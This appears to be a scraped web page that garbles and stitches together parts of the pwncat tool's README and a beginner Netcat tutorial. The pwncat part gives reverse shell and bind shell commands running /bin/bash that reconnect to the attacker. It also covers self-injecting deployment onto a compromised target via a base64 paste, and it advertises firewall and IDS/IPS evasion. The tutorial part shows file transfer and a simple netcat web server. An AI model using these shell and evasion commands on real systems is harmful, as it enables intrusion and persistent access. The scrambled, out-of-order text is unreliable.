Local and remote port forward (Proxy server/client) Self-injecting mode to deploy itself and start an unbreakable reverse shell back to you automatically TCP und UDP port scanning with basic version detection support Featureįully scriptable with Pwncat Scripting Engine to allow all kinds of fancy stuff on send and receive Pwncat has many features, below is only a list of outstanding characteristics. Pwncat example: Port forwarding magic :star: Features At a glance Pwncat -R 10.0.0.1:4444 3306 # Same, but convert traffic on your end to UDP Remote port forward -R (double client proxy) # Connect to Remote MySQL server (remote port 3306) and then connect to another # pwncat/netcat server on 10.0.0.1:4444 and bridge traffic
Pwncat -L 0.0.0.0:5000 3306 # Same, but convert traffic on your end to UDP Local port forward -L (listening proxy) # Make remote MySQL server (remote port 3306) available on current machine # on every interface on port 5000 Pwncat -e '/bin/bash' 4444 -u -ping-intvl 1 Port scan # IPv4 + IPv6 Pwncat -e '/bin/bash' 4444 -reconn -recon-wait 1 # Reverse UDP shell (Ctrl+c proof: reconnects back to you) # Reverse shell (Ctrl+c proof: reconnects back to you) Read in more detail about self-injection Summon shells # Bind shell (accepts new clients after disconnect) Inject to target # If you found a vulnerability on the target to start a very simple reverse shell, # such as via bash, php, perl, python, nc or similar, you can instruct your local # pwncat listener to use this connection to deploy itself on the target automatically # and start an additional unbreakable reverse shell back to you. # Paste it on the target machine echo "" | base64 -d > pwncat Unbreakable reverse shells - multiple shellsĭeploy to target # Copy base64 data to clipboard from where you have internet access
#NETCAT REVERSE SHELL CREATE TEXT FILE HOW TO#
See in action unbreakable reverse shells - how to spawn For more advanced techniques see :computer: Usage or :bulb: Examples. This is just a quick get-you-started overview.
#NETCAT REVERSE SHELL CREATE TEXT FILE WINDOWS#
(Wait for it, binary releases for Linux, MacOS and Windows will come shortly). Most importantly I wanted to have it in a language that I can understand and provide my own features with. Tool that works on older and newer machines (hence Python 2+3 compat). Integration tests run for multiple hours and break sporadically for various different reasons (network timeouts, unknown cancellations of GitHub Actions, etc): #735, #841Įver accidentally hit Ctrl+ c on your reverse shell and it was gone for good?Įver waited forever for your client to connect back to you, because the Firewall didn't let it out?Įver had a connection loss because an IPS closed suspicious ports?Įver were in need of a quick port forwarding?Īpart from that the current features of nc, ncat or socat just didn't feed my needs and I also wanted to have a single Failing builds do not indicate broken functionality.
mypy type coverage (fully typed: 94.00%) On my Kali linux machine I use : nc -lvp 1234 > test.Netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python ( PSE). If you want to send a text file through your network just use Netcat ! Something cool about Netcat is data transfer. Then run netcat cat index.html | nc -lvp 80 Here is how you can set up a simple web server If you want to test a simple server/client app that you programmed in your favorite language, try Netcat ! Simple Web server Netcat is the swiss army knife for hacker and network administrator. Here you will learn how to use Netcat and what is Netcat. Welcome to this my new tutorial ( or at least sharing some tips ).